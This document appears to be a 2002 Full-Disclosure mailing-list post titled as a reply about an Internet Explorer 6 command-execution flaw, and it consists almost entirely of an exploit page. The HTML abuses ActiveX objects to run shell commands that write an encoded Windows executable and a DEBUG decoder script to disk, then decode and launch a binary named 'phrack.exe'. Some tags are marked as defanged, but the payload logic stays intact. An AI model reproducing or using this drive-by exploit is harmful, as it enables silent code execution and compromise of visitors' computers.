[Full-Disclosure] Re: IE 6.x embedded command execution vulnerability #1033

From: gh b (full-disclosure@lists.netsys.com)
Date: 08/15/02


From: full-disclosure@lists.netsys.com (gh b)
Date: 15 Aug 2002 09:30:02 -0000


<html>
<DEFANGED_body>
<DEFANGED_OBJECT id=/"s/" classid=/"clsid:06290BD5-48AA-11D2-8432-006008C3FBFC/" width=/"14/" height=/"14/" >
</OBJECT>
<DEFANGED_script>
s.Reset();
s.Doc=/"<DEFANGED_object id=/'w/' classid=/'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B/'></object><DEFANGED_SCRIPT>w.Run(/'command /c echo TVqQAAMAAAAEAAAA..8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAA4fug4AtAnNIbg>E/',false,6);w.Run(/'command /c echo BTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABdFx3bGXZziBl2c4gZdnOIGXZziA>>E/',false,6);w.Run(/'command /c echo p2c4jlVmGIGHZziFJpY2gZdnOIAAAAAAAAAABQRQAATAEDAJistDkAAAAAAAAAAOAADwELAQUMAAQAAADKAAAAAAAAABAAAAAQA>>E/',false,6);w.Run(/'command /c echo AAAIAAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAAAAAQAABAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAEAgAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAA8AIAAAAQAAAABAAAAA>>E/',false,6);w.Run(/'command /c echo QAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAADYBAAAAIAAAAAIAAAAIAAA
AAAAAAAAAAAAAAABAAABALmRhdGEAAAAoxgAAADAAA>>E/',false,6);w.Run(/'command /c echo AACAAAACgAAAAAAAAAAAAAAAAAAQAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGgUMEAAaAEBAADotwIAAG>>E/',false,6);
w.Run(/'command /c echo oGagFqAujQAgAAo6IxQABmxwWmMUAAAgDHBaoxQAAAAAAAZscFqDFAAB5hahBopjFAAP81ojFAAOiFAgAAagX.NaIxQADofgIAA>>E/',false,6);w.Run(/'command /c echo DLAorYxQACitzFAALirEUAAaMgxQABqAGoAUGoAagDoKgIAALglEkAAaMwxQABqAGoAUGoAagDoEgIAAGj6AAAA6BoCAACgtjFA>>E/',false,6);w.Run(/'command /c echo AIodtzFAACLDPAB05ccF2DFAAEQAAADHBdwxQAAAAAAAxwXgMUAAAAAAAMcF5DFAAAAAAADHBQQyQAABAQAAZscFCjJAAAAAxwU>>E/',false,6);w.Run(/'command /c echo MMkAAAAAAAKHAMUAAoxAyQAChxDFAAKMUMkAAoxgyQABmxwUIMkAAAADHBZT1QACUAAAAaJT1QADoggEAAIM9pPVAAAJ1JGgcMk>>E/',false,6);w.Run(/'command /c echo AAaNgxQABqAGoAagBqAWoAagBoADBAAGoA6EsBAADrImgcMkAAaNgxQABqAGoAagBqAWoAagBoCDBAAGoA6CcBAADHBTwyQAAQA>>E/',false,6);w.Run(/'command /c echo AAAaDwyQABoLDJAAP81ojFAAOgyAQAAo0AyQABo gAAAOgRAQAA69BVi yDxOzHRfQMAAAAx0X4AAAAAMdF.AEAAABqAI1F9FBo>>E/',false,6);w.Run(/'command /c echo vDFAAGjAMUAA6MEAAADGBbYxQAABaPoAAADozgAAAGoAaKhhAABo7JNAAP81QDJAAOjbAAAAiUXwagCNRexQ.3XwaOyTQAD.Nbw>>E/',false,6);w.Run(/'command /c echo xQADooQAAAOvBycIEAFWL7IPE8MdF9AwA
AADHRfgAAAAAx0X8AQAAAGoAjUX0UGjEMUAAaLgxQADoRwAAAMYFtzFAAAFo gAAAO>>E/',false,6);w.Run(/'command /c echo hUAAAAagCNRfBQaKhhAABoRDJAAP81uDFAAOgzAAAAagD.dfBoRDJAAP81QDJAAOhOAAAA68TJwgQA.yUYIEAA.yUAIEAA.yUEI>>E/',false,6);w.Run(/'command /c echo EAA.yUIIEAA.yUMIEAA.yUQIEAA.yUUIEAA.yUgIEAA.yUkIEAA.yUoIEAA.yUsIEAA.yUwIEAA.yU0IEAA.yU4IEAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKIAAA3CAAAOwgAAD8IAAACCEAABAhAAC8IAAAAAAA>>E/',false,6);w.Run(/'command /c echo AHMAAIABAACAAgAAgA0AAIAQAACAEwAAgBcAAIAAAAAAfCAAAAAAAAAAAAAAHCEAAAAgAACcIAAAAAAAAAAAAAAqIQ
AAICAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAyiAAANwgAADsIAAA.CAAAAghAAAQIQAAvCAAAAAAAABzAACAAQAAgAIAAIANAACAEAAAgBMAAI>>E/',false,6);w.Run(/'command /c echo AXAACAAAAAAEEAQ3JlYXRlUGlwZQAAQgBDcmVhdGVQcm9jZXNzQQAASABDcmVhdGVUaHJlYWQAAGABR2V0VmVyc2lvbkV4QQD9A>>E/',false,6);w.Run(/'command /c echo VJlYWRGaWxlAABzAlNsZWVwALkCV3JpdGVGaWxlAEtFUk5FTDMyLmRsbAAAV1NPQ0szMi5kbGwAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGNtZC5leGUAY29tbWFuZC5jb20AAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo NDEC.COM>S/',false,6);w.Run(/'command /c echo A>>S/',false,6);w.Run(/'command /c echo DW6DE9 4501 5800 5858 5858 2E58 5858 0058 7263 652E 6578 5900 592E 5959 0000>>S/',false,6);w.Run(/'command /c echo DW000C 0000 0000 3E00 0000 0000 0000 0000 0000 0000 3F00 3400 363
5 3837 3A39>>S/',false,6);w.Run(/'command /c echo DW3C3B 003D 0000 0000 0000 0100 0302 0504 0706 0908 0B0A 0D0C 0F0E 1110 1312>>S/',false,6);w.Run(/'command /c echo DW1514 1716 1918 0000 0000 0000 1B1A 1D1C 1F1E 2120 2322 2524 2726 2928 2B2A>>S/',false,6);w.Run(/'command /c echo DW2D2C 2F2E 3130 3332 0000 0000 0000 0000 B800 3D00 03BA CD01 7221 A35E 0121>>S/',false,6);w.Run(/'command /c echo DW01B8 BA3D 0103 21CD 5172 23A3 B401 8B3F 211E B901 0001 80BA CD01 7221 3D1E>>S/',false,6);w.Run(/'command /c echo DW0000 1974 3E80 0180 7220 B410 8B40 231E B901 0001 80BA CD01 7221 EB22 B4D2>>S/',false,6);w.Run(/'command /c echo DW8B40 231E 3301 CDC9 7221 B414 8B3E 211E CD01 7221 B40A 8B3E 231E CD01 7221>>S/',false,6);w.Run(/'command /c echo DWC300 DB33 1E8A 0180 EB80 8A20 2587 D001 D0E0 8AE0 811E 8001 20EB 8F8A 0125>>S/',false,6);w.Run(/'command /c echo DWE9D0 E9D0 E9D0 E9D0 C102 84A2 3301 8ADB 811E 8001 20EB 878A 0125 0F24 E0D0>>S/',false,6);w.Run(/'command /c echo DWE0D0 E0D0 E0D0 1E8A 0182 EB80 8A20 258F D001 D0E9 0
2E9 A2C1 0185 DB33 1E8A>>S/',false,6);w.Run(/'command /c echo DW0182 EB80 8A20 2587 2401 D003 D0E0 D0E0 D0E0 D0E0 D0E0 8AE0 831E 8001 20EB>>S/',false,6);w.Run(/'command /c echo DW8702 0125 86A2 C301 571E 14E8 72FF B87D 3D02 03BA CD01 7221 A373 0121 3CB4>>S/',false,6);w.Run(/'command /c echo DWC933 10BA CD01 7221 A365 0123 3FB4 1E8B 0121 04B9 BA00 0180 21CD 87A3 7201>>S/',false,6);w.Run(/'command /c echo DW3D1A 0000 1574 45E8 B4FF 8B40 231E B901 0003 84BA CD01 7221 EB37 B8D3 4200>>S/',false,6);w.Run(/'command /c echo DW1E8B 0123 0E8B 011F 168B 011D 21CD 2272 40B4 1E8B 0123 C933 21CD 1672 3EB4>>S/',false,6);w.Run(/'command /c echo DW1E8B 0121 21CD 0C72 3EB4 1E8B 0123 21CD 0272 C033 1F5F 4CB4 21CD 1672 3EB4>>S/',false,6);w.Run(/'command /c echo.>>S/',false,6);w.Run(/'command /c echo R CX>>S/',false,6);w.Run(/'command /c echo 01FA>>S/',false,6);w.Run(/'command /c echo W>>S/',false,6);w.Run(/'command /c echo Q>>S/',false,6);w.Run(/'command /c DEBUG <S/',false,6);w.Run(/'command /c DEC.COM/',false,6);w.Run(/phrack
.exe/');<//"+/"SCRIPT>/";s.write();
</script>
</body>
</html>